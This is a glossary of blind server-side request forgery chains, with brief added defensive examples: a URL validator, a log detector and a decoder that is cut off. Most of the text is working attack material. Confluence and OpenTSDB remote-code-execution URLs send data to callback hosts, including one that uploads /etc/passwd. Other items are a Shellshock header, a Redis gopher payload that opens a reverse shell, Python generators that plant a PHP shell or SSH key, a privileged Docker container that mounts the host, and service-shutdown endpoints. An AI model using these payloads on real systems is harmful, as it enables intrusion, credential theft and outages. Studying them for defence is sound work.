A Glossary of Blind SSRF Chains

Introduction

What is Server-Side Request Forgery (SSRF)?

SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker crafts input that causes the server to issue a request of the attacker's choosing: a service that is able to make network requests is used as a pivot to attack other services, and the target is usually the internal network. SSRF appears when the server offers functionality that fetches data from other servers (for example, retrieving the text of a page at a given URL, loading an image from a given address, or downloading a file) without filtering or restricting the target address.
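Since SSRF arises when the target address is not filtered, here is an added example (not from the original post) of the server-side check a fetcher should apply before following a user-supplied URL. It rejects non-HTTP schemes such as gopher://, userinfo tricks of the form https://canary:443@example.com, non-standard ports, and any literal or name that resolves to a private, loopback, link-local or IPv4-mapped IPv6 address; the allowed scheme/port policy, fake_resolver and the FAKE_DNS table are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy assumptions for this example: only http(s) to ports 80/443 may leave the server.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def is_internal(ip):
    """True for addresses an outbound fetch must never reach."""
    # Unwrap IPv4-mapped IPv6 (e.g. [::ffff:127.0.0.1]) before classifying.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason). The resolver is injectable so the check can run offline in tests."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"  # e.g. https://canary:443@example.com
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IPv4/IPv6 address
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(ai[4][0]) for ai in resolver(host, None)}
        except (socket.gaierror, ValueError):
            return False, "resolution failed"
    if not addrs:
        return False, "no addresses"
    for ip in addrs:
        if is_internal(ip):
            return False, "resolves to internal address %s" % ip
    return True, "ok"


# Constructed resolver table so the example runs offline; 10.0.0.82 mirrors the
# DNS-data-source example in this glossary (a public name resolving to a VPC address).
FAKE_DNS = {"livestats.target.com": ["10.0.0.82"],
            "www.example.org": ["93.184.216.34"]}


def fake_resolver(host, port):
    if host not in FAKE_DNS:
        raise socket.gaierror(host)
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (a, 0)) for a in FAKE_DNS[host]]
```

Run the check again on every hop of a redirect chain and connect to the address that was validated, otherwise a redirect or a DNS answer that changes between check and connect bypasses it.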

Blind SSRF

When exploiting server-side request forgery, we often find that we cannot read the response. This behaviour is commonly called "blind SSRF". In that situation, how do we demonstrate impact? This was an interesting discussion started by Justin Gardner on Twitter:

If you can reach internal resources, there are many potential chains you can exploit to demonstrate impact. This post aims to document every known blind SSRF chain in as much detail as possible, and it will be updated as more techniques are discovered and shared.

You can find a GitHub repository containing all of these techniques here: Blind SSRF Chains

Please send us a pull request on GitHub if you would like to add more techniques to this glossary.

SSRF Canaries

(When chaining a blind SSRF into another SSRF internally, I tend to call them SSRF Canaries: something that makes an additional call externally, either via an application-specific open redirect or a blind XXE. Confluence, Artifactory, Jenkins, and JAMF have some good ones.)

To verify that you can interact with internal services or applications, you can use "SSRF Canaries".

Here, we request an internal URL that performs another SSRF and calls out to your canary host. If you receive a request on your canary host, it means you have successfully hit an internal service that is also able to make outbound requests.

This is an effective way to verify whether an SSRF vulnerability can reach the internal network or application, and also to verify whether certain software exists on the internal network. Depending on where it sits, you can also use an SSRF canary to reach more sensitive parts of the internal network.

Finding internal hosts with DNS data sources and AltDNS

The goal is to find as many internal hosts as possible; DNS data sources can be used to find all records that point to internal hosts.

In cloud environments we often see ELBs pointing to hosts inside an internal VPC. Depending on which VPC the asset is in, it may be possible to reach other hosts within the same VPC.

For example, suppose the following host was found in a DNS data source:

livestats.target.com -> internal-es-livestats-298228113.us-west-2.elb.amazonaws.com -> 10.0.0.82

You could assume that it represents Elasticsearch and perform further attacks against that host. You can also spray all of the blind SSRF payloads across every "internal" host identified through this method. This is generally effective.

To find more internal hosts, I recommend taking all of the DNS data, generating permutations with something like AltDNS, and then resolving them with a fast DNS brute-forcer.

Once done, identify all newly discovered internal hosts and use them as part of your blind SSRF chains.

Side-channel leaks

When exploiting a blind SSRF vulnerability, you may be able to leak some information about the returned response. For example, suppose you are triggering the blind SSRF via XXE; the error message may indicate whether:

  • A response was returned:

    Error parsing request: System.Xml.XmlException: Expected DTD markup was not found. Line 1, position 1.

  • The host and port could not be reached:

    Error parsing request: System.Net.WebException: Unable to connect to the remote server

  • Response status code:

    An online internal asset:port responds with "200 OK" vs an offline internal asset:port with "500 Internal Server Error"

  • Response content:

    The response size (in bytes) is small or large, depending on whether the URL you are trying to request is reachable.

  • Response time:

    The response time is slower or faster, depending on whether the URL you are trying to request is reachable.

Techniques

Possible via HTTP(s)

Elasticsearch

Default port: 9200

When Elasticsearch is deployed internally, it usually does not require authentication.

If you have a blind SSRF where you can determine the status code, check whether the following endpoints return 200:

/_cluster/health
/_cat/indices
/_cat/health

If you have a blind SSRF that can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following paths:

Note: this API has been removed from Elasticsearch version 2.x and above. This only works on Elasticsearch 1.6 and below.

/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown

Weblogic

Default ports: 80, 443 (SSL), 7001, 7002, 8888

SSRF Canary: UDDI Explorer (CVE-2014-4210)

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded

operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

This can also be achieved via GET:

http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

This endpoint is also vulnerable to CRLF injection:

GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close

Which will result in the following request:

root@mail:~# nc -lvp 4000
Listening on [0.0.0.0] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: Keep-Alive

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><env:Header/><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>sdf</name></find_business></env:Body></env:Envelope>

SSRF Canary: CVE-2020-14883

Taken from here.

Linux:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")

Windows:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")

Hashicorp Consul

Default ports: 8500, 8501 (SSL)

Writeup can be found here.

Shellshock

Default ports: 80, 443 (SSL), 8080

To test for Shellshock effectively, you may need to add a header containing the payload. The following CGI paths are worth trying:

List of CGI paths to test: Gist containing paths.

SSRF Canary: Shellshock via User Agent

User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ;  curl SSRF_CANARY

Apache Druid

Default ports: 80, 8080, 8888, 8082

See the Apache Druid API reference.

If you can see the status code, check the following paths to see whether they return a 200 status code:

/status/selfDiscovered/status
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/indexer/v1/taskStatus

Shutting down tasks requires you to guess the task ID or datasource name:

/druid/indexer/v1/task/{taskId}/shutdown
/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks

Shutting down supervisors on Apache Druid Overlords:

/druid/indexer/v1/supervisor/terminateAll
/druid/indexer/v1/supervisor/{supervisorId}/shutdown

Apache Solr

Default port: 8983

SSRF Canary: Shards Parameter

(To add to what shubham said - scanning for solr is relatively easy. There is a shards= parameter that lets you bounce SSRF to SSRF, to verify the solr instance you are blindly hitting.)

Taken from here

/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
/xxx?q=aaa%26shards=http://SSRF_CANARY/solr 
/xxx?q=aaa&shards=http://SSRF_CANARY/solr

SSRF Canary: Solr XXE (2017)

Apache Solr 7.0.1 XXE (Packetstorm)

/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>'
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"}

RCE via dataImportHandler

Research on RCE via dataImportHandler

PeopleSoft

Default ports: 80, 443 (SSL)

Taken from this research

SSRF Canary: XXE #1

POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...

<?xml version="1.0"?>
<!DOCTYPE IBRequest [
<!ENTITY x SYSTEM "http://SSRF_CANARY">
]>
<IBRequest>
   <ExternalOperationName>&x;</ExternalOperationName>
   <OperationType/>
   <From><RequestingNode/>
      <Password/>
      <OrigUser/>
      <OrigNode/>
      <OrigProcess/>
      <OrigTimeStamp/>
   </From>
   <To>
      <FinalDestination/>
      <DestinationNode/>
      <SubChannel/>
   </To>
   <ContentSections>
      <ContentSection>
         <NonRepudiation/>
         <MessageVersion/>
         <Data><![CDATA[<?xml version="1.0"?>your_message_content]]>
         </Data>
      </ContentSection>
   </ContentSections>
</IBRequest>

SSRF Canary: XXE #2

POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...

<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">

Apache Struts

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

Taken from here

SSRF Canary: Struts2-016:

Append this to the end of every internal endpoint/URL you know of:

?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

JBoss

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

Taken from here

SSRF Canary: Deploy WAR from URL

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war

Confluence

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

RCE via OGNL injection (CVE-2021-26084)

/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/confluence/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/wiki/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/doenterpagevariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/createpage.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/templates2/viewpagetemplate.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/pages/createpage-entervariables.action?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/template/custom/content-editor?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/templates/editor-preload-container?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027
/users/user-dark-features?queryString=aaa%5Cu0027%252b%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName(%5Cu0022java.lang.Runtime%5Cu0022).getMethod(%5Cu0022getRuntime%5Cu0022%2Cnull).invoke(null%2Cnull).exec(%5Cu0022curl%20%3Cinstance%3E.burpcollaborator.net%5Cu0022)%7D%252b%5Cu0027

SSRF Canary: Sharelinks (Confluence versions released in November 2016 and earlier)

/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/

SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

Jira

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)

Atlassian Security Ticket JRASERVER-69793

/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com

Other Atlassian products

Default ports: 80, 443 (SSL), 8080, 8443 (SSL)

SSRF Canary: iconUriServlet (CVE-2017-9506):

  • Bamboo < 6.0.0
  • Bitbucket < 4.14.4
  • Crowd < 2.11.2
  • Crucible < 4.3.2
  • Fisheye < 4.3.2

Atlassian Security Ticket OAUTH-344

/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY

OpenTSDB

Default port: 4242

OpenTSDB Remote Code Execution

SSRF Canary: curl via RCE

/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png

OpenTSDB 2.4.0 Remote Code Execution

SSRF Canary: curl via RCE - CVE-2020-35476

/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

Jenkins

Default ports: 80, 443 (SSL), 8080, 8888

Taken from here

SSRF Canary: CVE-2018-1000600

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai

RCE

Following the instructions here, RCE via GET: Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!

/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;

RCE via Groovy

from urllib.parse import quote  # Python 3; the original snippet used Python 2's urllib.quote

cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + quote(pay)

Hystrix Dashboard

Default ports: 80, 443 (SSL), 8080

Spring Cloud Netflix, versions 2.2.x prior to 2.2.4 and versions 2.1.x prior to 2.1.6.

SSRF Canary: CVE-2020-5412

/proxy.stream?origin=http://SSRF_CANARY/

W3 Total Cache

Default ports: 80, 443 (SSL)

W3 Total Cache 0.9.2.6-0.9.3

SSRF Canary: CVE-2019-6715

This needs to be a PUT request:

PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: 
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close

{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}

SSRF Canary

The advisory for this vulnerability is published here: W3 Total Cache SSRF vulnerability

This PHP code will generate a payload for your SSRF Canary host (replace url with your canary host):

<?php

// Replace with your SSRF canary host.
$url='http://www.google.com';
// Deflate, base64-encode and make URL-safe ('+' -> '-', '/' -> '_'), then strip the '=' padding.
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_');
$file=chop($file,'=');
$req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css';
echo($req);

?>

Docker

Default ports: 2375, 2376 (SSL)

If you have a partially echoed SSRF, you can use the following paths to verify the presence of the Docker API:

/containers/json
/secrets
/services

Trigger RCE by running an arbitrary Docker image

POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type: application/json
...

{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}

Replace alpine with any image you want the Docker container to run.

Gitlab Prometheus Redis Exporter

Default port: 9121

This vulnerability affects GitLab instances before version 13.1.1. According to the GitLab documentation, Prometheus and its exporters have been enabled by default since GitLab 9.0.

These exporters give an attacker a good way to pivot to other services using CVE-2020-13379. One easily exploited exporter is the Redis Exporter.

The following endpoint will allow an attacker to dump all keys from the Redis server supplied via the target parameter:

http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
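The HTTP chains above all share a server-side shape: a request to a known endpoint whose parameter carries a URL the server is then asked to fetch. Added here as a detection example (not part of the original post): a scan over access-log lines that flags such requests and extracts where the server was asked to connect; the CANARY_PARAMS list, the log-format regex and the SAMPLE_LOG lines are constructed assumptions for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> parameter pairs taken from the chains in this glossary. A request to one of these
# paths whose parameter carries a URL is the server-side hop of an SSRF canary and worth alerting on.
# Assumption: an illustrative starting list, not a complete signature set.
CANARY_PARAMS = [
    (r"/uddiexplorer/SearchPublicRegistries\.jsp$", "operator"),   # WebLogic CVE-2014-4210
    (r"/plugins/servlet/oauth/users/icon-uri$", "consumerUri"),     # Atlassian CVE-2017-9506
    (r"/plugins/servlet/gadgets/makeRequest$", "url"),              # Jira CVE-2019-8451
    (r"/rest/sharelinks/1\.0/link$", "url"),                        # Confluence sharelinks
    (r"/proxy\.stream$", "origin"),                                 # Hystrix CVE-2020-5412
    (r"/(select|search)$", "shards"),                               # Solr shards parameter
    (r"/createTokenByPassword$", "apiUrl"),                         # Jenkins CVE-2018-1000600
    (r"/scrape$", "target"),                                        # GitLab Redis exporter
]

# Common/combined access-log format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify(line):
    """Return a finding dict for a canary-style request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query)  # also percent-decodes the values
    for path_re, param in CANARY_PARAMS:
        if not re.search(path_re, parts.path):
            continue
        for value in query.get(param, []):
            if URL_RE.match(value):  # parameter present and shaped like a URL
                return {"src": m.group("src"), "time": m.group("time"), "path": parts.path,
                        "param": param, "target": value, "target_host": urlsplit(value).hostname,
                        "status": int(m.group("status"))}
    return None


def scan(lines):
    return [f for f in map(classify, lines) if f is not None]


# Constructed sample log lines (clients and times are made up); canary.example.net stands in
# for an external callback host and 10.0.0.82 for the VPC host named earlier in this glossary.
SAMPLE_LOG = [
    '10.1.2.3 - - [10/Oct/2023:13:55:36 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2Fcanary.example.net&rdoSearch=name&txtSearchname=test HTTP/1.1" 200 1043',
    '10.1.2.4 - - [10/Oct/2023:13:55:37 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://10.0.0.82:9200/_cluster/health HTTP/1.1" 200 512',
    '10.1.2.5 - - [10/Oct/2023:13:55:38 +0000] "GET /rest/api/2/search?jql=project%3DABC HTTP/1.1" 200 2048',
    '10.1.2.6 - - [10/Oct/2023:13:55:39 +0000] "GET /solr/db/select?q=orange&shards=http://canary.example.net/solr/atom&wt=json HTTP/1.1" 500 0',
]
```

The third line matches a path pattern but carries no shards parameter and is therefore not reported; the status code of a flagged request is kept because, as the side-channel section notes, it often tells whether the internal target was reachable.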

Possible via Gopher

Redis

Default port: 6379

Recommended reading:

RCE via Cron - Gopher Attack Surfaces

redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save

Gopher:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

RCE via uploading a (PHP) shell - Redis Getshell Summary

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from urllib.parse import quote  # the original script used Python 2's urllib.quote

protocol = "gopher://"
ip = "192.168.189.208"
port = "6379"
shell = "\n\n<?php phpinfo();?>\n\n"
filename = "shell.php"
path = "/var"
passwd = ""

# Spaces inside the value are replaced with ${IFS} so that split(" ") in
# redis_format() does not break the value into several arguments.
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # Encode one command in the Redis RESP protocol: "*<argc>", then "$<len>" and the argument for each word.
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += quote(redis_format(x))
    print(payload)

RCE via authorized_keys - Redis Getshell Summary

from urllib.parse import quote  # the original script used Python 2's urllib.quote

protocol = "gopher://"
ip = "192.168.189.208"
port = "6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
filename = "authorized_keys"
path = "/root/.ssh/"
passwd = ""

# Spaces inside the key are replaced with ${IFS} so that split(" ") in
# redis_format() does not break the value into several arguments.
cmd = ["flushall",
       "set 1 {}".format(sshpublic_key.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # Encode one command in the Redis RESP protocol: "*<argc>", then "$<len>" and the argument for each word.
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += quote(redis_format(x))
    print(payload)
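For triage of a captured gopher:// Redis payload like the ones the two scripts above emit, here is an added decoder (not from the original post or the Redis Getshell Summary) that percent-decodes the gopher selector, parses the RESP stream back into commands and reports the FLUSHALL / CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence that redirects the RDB dump; SAMPLE_URL is a constructed example and the host 10.0.0.5 is made up.

```python
from urllib.parse import quote, unquote


def parse_resp(data):
    """Parse a stream of RESP arrays (plus bare inline commands such as 'quit') into argv lists."""
    cmds, i = [], 0
    try:
        while i < len(data):
            if data[i] != "*":  # inline command: one whitespace-separated line
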